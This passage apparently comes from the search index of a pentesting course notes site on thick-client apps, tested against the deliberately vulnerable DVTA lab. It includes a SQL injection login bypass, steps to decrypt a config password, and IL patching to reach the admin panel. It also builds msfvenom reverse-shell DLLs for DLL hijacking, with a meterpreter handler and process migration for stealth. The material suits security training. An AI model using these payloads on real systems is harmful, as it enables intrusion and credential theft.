              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-hard-coded-credentials","title":"1. Hard Coded credentials","text":"

              Developer often stores hardcode sensitive details in thick clients.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#strings","title":"strings","text":"

              Strings comes in sysInternalsSuite. It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary:

              strings.exe C:\\Users\\admin\\Desktop\\tools\\original\\DVTA.exe > C:\\Users\\admin\\Desktop\\strings.txt\n

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#dnspy","title":"dnspy","text":"

              We know the FTP conection is done in the Admin screen, so we open the application with dnspy and we locate the button in the Admin screen that calls the FTP conection. Credentials for the conection can be there:

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-storing-sensitive-data-in-registry-entries","title":"2. Storing sensitive data in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#regshot","title":"regshot","text":"

              1. Run regshot version according to your thick-app (84 or 64 v).

              2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

              3. Open the app you want to test and login into it.

              4. Perform some kind of action, like for instance, viewing the profile.

              5. Take a \"Second shot\" of the Registry entries.

              6. After that, you will see the button \"Compare\" enabled. Click on it.

              An HTML file will be generated and you will see the registry entries:

              An interesting registry is \"isLoggedIn\", that has change from false to true. This may be a potential vector of attack (we could set it to true and also change username to admin).

              HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-database-connection-strings-in-memory","title":"3. Database connection strings in memory","text":"

              When doing a connection to database, that string that does it may be:

              • in clear text
              • or encrypted.

              If encrypted, it 's still possible to find it in memory. If we can dump the memory of the process we should be able to find the clear text conection string in memory.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#process-hacker-tool","title":"Process Hacker tool","text":"

              Download from: https://processhacker.sourceforge.io/downloads.php

              We will be using the portable version.

              1. Open the application you want to test.

              2. Open Process Hacker Tool.

              3. Select the application, click right on \"Properties\".

              4. Select tab \"Memory\".

              5. Click on \"Strings\".

              6. Check \"Image\" and \"Mapped\" and search!

              7. In the results you can use the Filter option to search for (in this case) \"data source\".

              Other possible searches: Decrypt. Clear text conection string in memory reveals credentials: powned!!!

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-sql-injection","title":"4. SQL injection","text":"

              If input is not sanitize, when login into an app we could deceive the logic of the request to the database:

              select * from users username='x' and password='x';\n

              In the DVTA app, we could try to do this:

              select * from users username='x' or 'x'='x' and password='' or 'x'='x';\n

              For that we only need to enter this into the login page:

              x' or 'x'='x\n

              And now we are ... raymond!!!

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#5-side-channel-data-leaks","title":"5. Side channel data leaks","text":"

              Application logs are an example of side channel data leaks. Developers offen use logs for debugging purposes during development.

              Where can you find those files? For example in Console logs. Open the command prompt and run the vulnerable thick application this way:

              dvta.exe > C:/Users/admin/Desktop/dvta_logs.txt\n

              After that open the DVTA application, login as admin and do some actions. When done, close the application.

              If you want to add some more logs with a different user, open again the app from console and append the new outcome to the file:

              dvta.exe >> C:/Users/admin/Desktop/dvta_logs.txt\n

              Now, login into the app as a regular user and browse around.

              Open the file with the logs of the application and, if you are lucky and debug mode is still on, you will be able to see some stuff such as SQL queries, decrypted database passwords, users, temp location of the ftp file...

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#6-unreliable-data","title":"6. Unreliable data","text":"

              Some applications may log some data (for instance timestamp) for later use. If the user is able to tamper this data.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#7-dll-hijacking","title":"7. DLL Hijacking","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#what-is-dll-hijacking","title":"What is DLL Hijacking","text":"

              A Dynamic Link Library (DLL) file usually holds executable code that can be used by other application, meaning that can act as a Library. This makes DLL files very attractive to attackers because if they manage to deceive the application into using a different DLL (with the same name) then this action may end up in compromising the active.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-is-dll-hijacking-perform","title":"How is DLL Hijacking perform?","text":"

              When calling a DLL file, if an absolute path is not provided, then there are some techniques to deceive the app.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#placing-our-dll-in-the-directory-in-which-the-app-will-look","title":"Placing our DLL in the directory in which the app will look","text":"

              This is the expected DLL order:

              • The directory from which the application is loaded.
              • The current directory.
              • The system directory
                (C:\\\\Windows\\\\System\\\\)\n
              • The 16-bit system directory.
              • The Windows directory.
              • The directories that are listed in the PATH environment variable.
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-locate-interesting-dll-files-with-processmonitor-or-procmon","title":"1. Locate interesting DLL files with ProcessMonitor (or ProcMon)","text":"

              We can try to find some DLL files that the app is requesting but not finding. And for that we can use ProcessMonitor and some filters like:

              • Process Name is DVTA.exe
              • Result is NAME NOT FOUND
              • Path ends with dll.

              If you login into the app, you will find some DLL files that can be used to try an exploitation:

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-crafting-our-malicious-dll-and-serving-them-to-the-machine","title":"2. Crafting our malicious DLL and serving them to the machine","text":"

              We will be assuming we will try to deceive the app with these 2 files:

              • SECUR32.dll
              • DWrite.dll

              We will open a kali machine, we will craft two dll payloads using msfvenom, we will copy them into our root apacher server and we will launch apache to serve those two files. Commands:

              msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n\n# Copying payloads to apache root folder\nsudo cp SECUR32.dll /var/www/html/\ncp SECUR32.dll DWrite.dll\nsudo cp DWrite.dll /var/www/html \n\n# starting apache\nservice apache2 start\n

              Now, in the Windows 10 VM (maybe after disabling RealTime protection), we can retrieve those files with:

              curl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\SECUR32.dll\ncurl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\Dwrite.dll\n
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-launching-the-attack","title":"3. Launching the attack","text":"

              Place the DLL crafted file into the same folder than the application. In my case I will place DWrite.dll into

              C:\\Users\\admin\\Desktop\\tools\\original\n

              In the Kali machine, start metasploit and set a handler:

              msfconsole\n
              use exploit/multi/handle\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.0.2.15\nset LPORT 4444\nrun\n

              Now you can start the application in the windows machine, and on the listener handler in kali, you will get a meterpreter.

              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-moving-your-meterpreter-to-a-different-process","title":"4. Moving your meterpreter to a different process","text":"

              List all processes in the meterpreter and migrate to a less suspicious one. This will also unblock the DVTA app in the windows machine:

              ps\nmigrate <ID>\n
              ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-to-connect-to-a-database-after-getting-the-credentials","title":"How to connect to a database after getting the credentials","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-basic-lab-setup/","title":"Basic Lab Setup - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#environment-description","title":"Environment description","text":"
              • VirtualBox or VMWare Installation workstation.
              • Windows 10 VM 1 (database) -> SQL server.
              • (optional) Windows 10 VM 2 (client) -> DVTA.

              In the course we will be using an unique Windows 10 machine with both the SQL server and the DVTA application installed. Therefore, there will not be the need to have a second Windows 10 VM since all the needed applications will be installed on this unique virtual machine.

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#software-resources","title":"Software resources","text":"
              • Get windows 10 iso from: Repo for legacy Operating system.
              • Damn Vulnerable Thick Client Application DVTA (modified version given in the course): https://drive.google.com/open?id=1u46XDgVpCiN6eGAjILnhxsGL9Pl2qgcD.
              • SQL Server Express 2008: SQL Server\u00ae 2008 R2 SP2.
              • SQL Server Management Studio SQL Server Management Studio (SSMS).
              • Filezilla FTP Server: FileZilla Server for Windows (64bit x86) (filezilla-project.org).

              Now, open the Windows 10 VM and start the lab setup!

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#1-install-sql-server-express-2008","title":"1. Install SQL Server Express 2008","text":"

              In the Download page we will choose SQLEXPR_x64_ENU.exe.

              Some helpful tips and screenshots about the installation:

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#2-install-sql-server-management-studio-1901","title":"2. Install SQL Server Management Studio 19.0.1","text":"

              This installation is pretty straighforward. Download page

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#creating-database-dtva-four-our-vuln-thick-app","title":"Creating database DTVA four our vuln thick app","text":"

              We will create the database \"DVTA\" and we will populate it with some users and expenses:

              1. Open SSMS (SQL Server Management Studio) and right click on the \"Database\" object, and create a new database called DVTA.

              2. Create a new table \"users\" in the database DVTA.

              Here is the query:

              CREATE TABLE \"users\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"username\" VARCHAR(100) NOT NULL,\n    \"password\" VARCHAR(100) NOT NULL,\n    \"email\" VARCHAR(100) NULL DEFAULT NULL,\n    \"isadmin\" INT NULL DEFAULT '0',\n    PRIMARY KEY (\"id\")\n)\n

              3. Populate the database with 3 given users:

              Here is the query:

              INSERT INTO dbo.users (username, password, email, isadmin)\nVALUES\n('admin','admin123','admin@damnvulnerablethickclientapp.com',1),\n('rebecca','rebecca','rebecca@test.com',0),\n('raymond','raymond','raymond@test.com',0);\n

              4. Create the table \"expenses\" in the database DVTA.

              Here is the query:

              CREATE TABLE \"expenses\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"email\" VARCHAR(100) NOT NULL,\n    \"item\" VARCHAR(100) NOT NULL,\n    \"price\" VARCHAR(100) NOT NULL,\n    \"date\" VARCHAR(100) NOT NULL,\n    \"time\" VARCHAR(100) NULL DEFAULT NULL,\n    PRIMARY KEY (\"id\")\n)\n
              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#adittional-configurations","title":"Adittional configurations","text":"

              Some configurations need to be done so the conection works:

              1. Open SQL Server Configuration Manager and enable TCP/IP Protocol conections:

              2. Also in SQL Server Configuration Manager, restart SQL Server (SQLEXPRESS)

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#3-install-filezilla-ftp-server","title":"3. Install Filezilla FTP server","text":"

              1. Download Filezilla Server, install it and initiate a connection: Download page

              As for the conection initiation, I'm using localhost 127.0.0.1, port 14148 and password \"filezilla\":

              2. Add a user. Name \"dvta\" and password \"p@ssw0rd\"

              3. Add a Shared folder. Be careful with slashes and backslashes (wink!) not to get the typical error \"error on row number 1 virtual path must be absolute\".

              ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-common-vulnerabilities/","title":"Common vulnerabilities","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#application-signing","title":"Application Signing","text":"

              For checking if the application is signed, we use the tool sigcheck, from SysInternals Suite.

              From command line we run sigcheck.exe and check if DVTA.exe is signed.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#compiler-protection","title":"Compiler protection","text":"

              We will use the tool binscope, provided by Microsoft.

              Download it from: https://www.microsoft.com/en-us/download/details.aspx?id=44995

              Install it by double-clicking on it.

              Now from command line:

              .\\binscope.exe /verbose /html /logfile c:/path/to/outputreport.html C:/path/to/application/toAudit/DVTA.exe\n

              After executing the command you will obtain a report of some basic checks that binscope run on the application.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#automated-source-code-scanning","title":"Automated source code scanning","text":"","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#visual-code-grepper","title":"Visual Code Grepper","text":"

              Download it from: https://sourceforge.net/projects/visualcodegrepp/

              To run a scan:

              1. Open the application in dotpeek and export it as a visual Studio project. This will export the decompiled code of the application where we indicate.

              2. Open Visual Code Grepper. In menu FILE, first option, specify the target directory (where we saved the decompiled files). If error message says that \"no files for the specified language\", change language in menu Settings (C#).

              3. Click on menu Scan> Full scan.

              ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-first-challenge/","title":"First challenge: enabling a button","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.

              One thing is still missing after the Basic lab setup: launching the application and making sure that it works. If we proceed, sooner than later we will see that one thing is left to be done before starting to use DVTA app: Setting up the server in the vulnerable app (DVTA).

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#the-problem-a-button-is-not-working","title":"The problem: a button is not working","text":"

              If we launch the vulnerable app, DVTA, we will check that the button labelled as \"Configure Server\" is not enable. We will use the tool dnspy to enable that button.

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#using-dnspy-to-see-and-modify-compiled-code","title":"Using dnspy to see and modify compiled code","text":"

              1. We will use dnspy 32 bit version, since dvta is a 32 bit app. Open the version 32 bit of dnspy, and go to FILE > Open > [Select de DVTA.exe file] and you will see it in the sidebar of dnspy:

              2. Expand DVTA, go to the decompiled object that is being used in the login and read the code. You will see the function isserverConfigured(). Also in the opening tooltip you can read that this function is receiving a BOOLEAN value.

              3. Edit the function in IL instructions

              4. Modify the value of the boolean in the IL instruction.

              5. Save the module.

              6. Now when you open the DVTA application the button will be enabled and we will be able to setup the server. Our server is going to be that one of the database that we just configure for our application (127.0.0.1).

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#making-sure-that-it-works","title":"Making sure that it works","text":"

              If we browse the configuration file (DVTA.exe.Config) we will see that the configuration has taken place:

              ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-information-gathering-phase/","title":"Information gathering phase - Thick client Applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#what-we-will-be-doing","title":"What we will be doing","text":"

              1. Understand the functionality of the application.

              2. Architecture diagram from the client.

              3. Network communications in the app.

              4. Files that are being accessed by the client.

              5. Interesting files within the application directory.

              Tools: CFF explorer, wireshark, and sysInternalsSuite.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#ip-addresses-that-the-app-is-communicating-with","title":"IP addresses that the app is communicating with","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#tcp-view","title":"TCP View","text":"

              To see which IP addresses is the app communicating with, we can use TCP View from sysInternalsSuite.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#wireshark","title":"Wireshark","text":"

              We can also use wireshark

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#language-in-which-the-app-is-built-in","title":"Language in which the app is built in","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#cff-explorer","title":"CFF Explorer","text":"

              To see which language is the app build in, and which tool was used, we can use CFF explorer. Open the app with CFF Explorer.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#changes-in-the-filesystem","title":"Changes in the FileSystem","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#procesmonitor","title":"ProcesMonitor","text":"

              Use ProcessMonitor tool from sysInternalsSuite to see changes in the file system.

              For instance, you can analyze the access to interesting files in the application directory. Now we have this information:

              <add key=\"DBSERVER\" value=\"127.0.0.1\\SQLEXPRESS\" />\n<add key=\"DBNAME\" value=\"DVTA\" />\n<add key=\"DBUSERNAME\" value=\"sa\" />\n<add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n<add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n<add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n<add key=\"ClientSettingsProvider.ServiceUri\" value=\"\" />\n<add key=\"FTPSERVER\" value=\"127.0.0.1\" />\n
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#locate-credentials-and-information-in-registry-entries","title":"Locate credentials and information in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#processmonitor","title":"ProcessMonitor","text":"

              Using ProccessMonitor from sysInternalsSuite to locate credentials and information stored in the key registers. And for that, after cleaning all the processes in ProcMon (ProcessMonitor app), you close the application and reopen it.

              If the session is still there, it means that the session is saved somewhere. In this case the session is saved in the registry keys.

              Interesting thing here is the Registry Key \"isLoggedIn\". We could try to modify the boolean value of that registry to bypass login.

              Also, check these other tools and resources:

              • WinSpy.
              • Window Detective
              • netspi.com.
              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#enumerate-libraries-and-resources-employed-in-building-the-app","title":"Enumerate libraries and resources employed in building the app","text":"

              When pentesting a thick-client application, I came across this nice way to enumerate libraries, dependencies, sources... By using Sigcheck from sysInternalsSuite, you can view metadata from the images with executables. Additionally, you can save the results to a CSV for reporting purposes.

              .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n

              One cool flag is the recursive one (\"-s\"), which helps you avoid navigating through the folder structure.

              ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-reversing-and-patching/","title":"Reversing and patching thick clients applications","text":"

              General index of the course

              • Introduction.
              • Tools for pentesting thick client applications.
              • Basic lab setup.
              • First challenge: enabling a button.
              • Information gathering phase.
              • Traffic analysis.
              • Attacking thick clients applications.
              • Reversing and patching thick clients applications.
              • Common vulnerabilities.
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#reversing-net-applications","title":"Reversing .NET applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#required-software","title":"Required software","text":"
              • dnspy: c# code + IL code + patching the application
              • dotPeek (from JetBrains)
              • ILspy / Reflexil
              • ILASM (IL Assembler) (comes with .NET Framework).
              • ILDASM (IL Disassembler) (comes with Visual Studio).

              IL stands for Intermediate Language.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-visual-studio-community-2019-version-1611","title":"Installing Visual Studio Community 2019 (version 16.11)","text":"

              Download from: https://my.visualstudio.com/Downloads?q=Visual%20Studio%202019

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-dotpeek","title":"Installing dotPeek","text":"

              dotPeek Cheatsheet Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-with-dotpeek-executing-with-visual-studio","title":"decompiling with dotPeek + executing with Visual Studio","text":"

              We will try to decompile the app using dotPeek to decrypt the database connection. Remember from the config file

                    <add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n      <add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n      <add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n

              (The config file was DVTA.exe.Config, located in the same directory as the app).

              We will use dotpeek + Visual Studio to understand the logic under that connection.

              Open the app DVTA from dotpeek, go to DVTA>References>DBAccess and double click it. Then you will get a Resource uploaded with the name > DBAccess Class. In it there is a function called decryptPassword()

              public string decryptPassword()\n    {\n      string s1 = ConfigurationManager.AppSettings[\"DBPASSWORD\"].ToString();\n      string s2 = ConfigurationManager.AppSettings[\"AESKEY\"].ToString();\n      string s3 = ConfigurationManager.AppSettings[\"IV\"].ToString();\n      byte[] inputBuffer = Convert.FromBase64String(s1);\n      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n      cryptoServiceProvider.BlockSize = 128;\n      cryptoServiceProvider.KeySize = 256;\n      cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(s2);\n      cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(s3);\n      cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n      cryptoServiceProvider.Mode = CipherMode.CBC;\n      this.decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n      Console.WriteLine(this.decryptedDBPassword);\n      return this.decryptedDBPassword;\n

              So we will open Visual Studio and we will create a New Project, a Windows Form Application (.NET Framework). We will call the project PasswordDecryptor. Create a button. Name it Decrypt.

              By double-clicking on the Decrypt button we will be taken to the Source code of that button.

              This is what we are going to put in that button:

              using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\nusing System.Data;\nusing System.Drawing;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.Security.Cryptography;\n\nnamespace decryptorpassword\n{\n    public partial class Decrypt : Form\n    {\n        public Decrypt()\n        {\n            InitializeComponent();\n        }\n\n        private void button1_Click(object sender, EventArgs e)\n        {\n            string dbpassword = \"CTsvjZ0jQghXYWbSRcPxpQ==\";\n            string  aeskey = \"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\";\n            string iv = \"fq20T0gMnXa6g0l4\";\n            byte[] inputBuffer = Convert.FromBase64String(dbpassword);\n            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n            cryptoServiceProvider.BlockSize = 128;\n            cryptoServiceProvider.KeySize = 256;\n            cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(aeskey);\n            cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(iv);\n            cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n            cryptoServiceProvider.Mode = CipherMode.CBC;\n            string decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n            Console.WriteLine(decryptedDBPassword);\n        }\n    }\n}\n

              Some things not said in the video: it's quite possible you will need to debug this simple application. For that, the best thing to do is reading error messages and try to fix them. In my case, a basic library for the execution of this code was missing:

              using System.Security.Cryptography;\n

              Also, it was needed to rename the .exe output file in the Main() function like this

              # what it said\n  Application.Run(new Form1());\n# what it needed to say to match to my code\n  Application.Run(new Decrypt());\n
              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-and-executing-with-dnspy","title":"Decompiling and executing with dnspy","text":"

              1. Open the application in dnspy. Go to Login. Click on namespace DBAccess

              2. Click on DBAccessClass

              3. Locate the function decryptPassword(). That's the one we would love to run. For that locate where it is called from. Add a Breakpoint there. Run the code. You will be asked about which executable to run (select DVTA.exe). After that, the code will be executed up to the breakpoint. Enter credentials and see in the Notification area how variables are being called.

              Eventually, you will see the decrypted connection string in those variables. You can add more breakpoints.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilspy-reflexil-to-patch-applications","title":"Using ILSpy + Reflexil to patch applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#ilspy-setup","title":"ILSpy Setup","text":"

              Repository: https://github.com/icsharpcode/ILSpy/releases

              Requirements: .NET 6.0. Download zip to tools. Place the file ILSpy_binaries_8.0.0.7246-preview3.zip into the tool folder and extract files.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#setup-reflexil-plugin-in-ilspy","title":"Setup Reflexil plugin in ILSpy","text":"

              1. Download from: https://github.com/sailro/Reflexil/releases

              2. Place the file reflexil.for.ILSpy.2.7.bin into tools and extract files.

              3. Enter the Reflexil folder and copy the .dll file Reflexil.ILSpy.Plugin.dll.

              4. Place it into ILSpy directory. Now the plugin is installed.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#patching-with-ilspy-reflexil","title":"Patching with ILSpy + Reflexil","text":"

              One interesting thing about ILSpy (different from other tools) is that you can see code in 3 modes: IL, C# and the combined mode, C# + IL. This last mode comes in hand to be able to interpretate much better what the code is about.

              1. Open DVTA app from ILSpy and locate this code:

              Access to the admin pannel is decided with an IF statement and a integer variable set to 0/1. We will modify this value using ILSpy + Reflexil and patch again the application.

              2. Open Reflexil plugin:

              3. In the Reflexil pannel, look for the specific instruction (the one that moves to the pile the value 1) and change the value to 0.

              4. Save the changes in your DVTA application with a different name:

              5. When opening the new saved application, you will access admin pannel even if you login with normal user credentials.

              ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilasm-and-ldasm-to-patch-applications","title":"Using ilasm and ldasm to patch applications","text":"

